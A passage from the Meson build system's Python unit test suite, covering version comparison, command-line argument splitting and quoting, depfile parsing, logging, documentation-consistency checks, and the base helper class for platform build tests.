PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
